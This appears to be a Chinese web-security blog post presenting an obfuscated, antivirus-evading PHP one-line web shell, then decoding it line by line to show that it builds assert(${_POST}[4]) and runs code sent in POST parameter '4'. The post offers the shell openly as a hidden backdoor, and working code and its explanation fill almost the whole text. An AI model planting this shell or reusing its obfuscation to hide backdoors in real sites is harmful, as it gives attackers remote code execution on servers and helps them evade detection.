一个隐藏性很强的免杀pHp一句话 – 网站安全 – 自

时间: 2020-10-10|tag: 87次围观|0 条评论

 

<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?
>

一个隐藏性很强的pHp一句话
$a=range(1,200);//$a是一个1~200的数组
chr($a[96-1+1])……//$a[96-1+1]就是取数组$a的第96-1+1个元素 也就是$a[96];也就是97(因为数组是从0开始的)chr(97)就是a 按这个方法继续看

$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]);
$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
$b=”assert”;

下面同理

chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83]) = _POST
chr($a[51]) = 4

所以连起来就是
assert(${_POST}[4]);
密码就是4
    上一篇: 方维团购4.3最新版sql分析 - 网站安全 - 自学php

    下一篇: 189.cn某分站任意Url跳转 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《一个隐藏性很强的免杀pHp一句话 – 网站安全 – 自
   

还没有人抢沙发呢~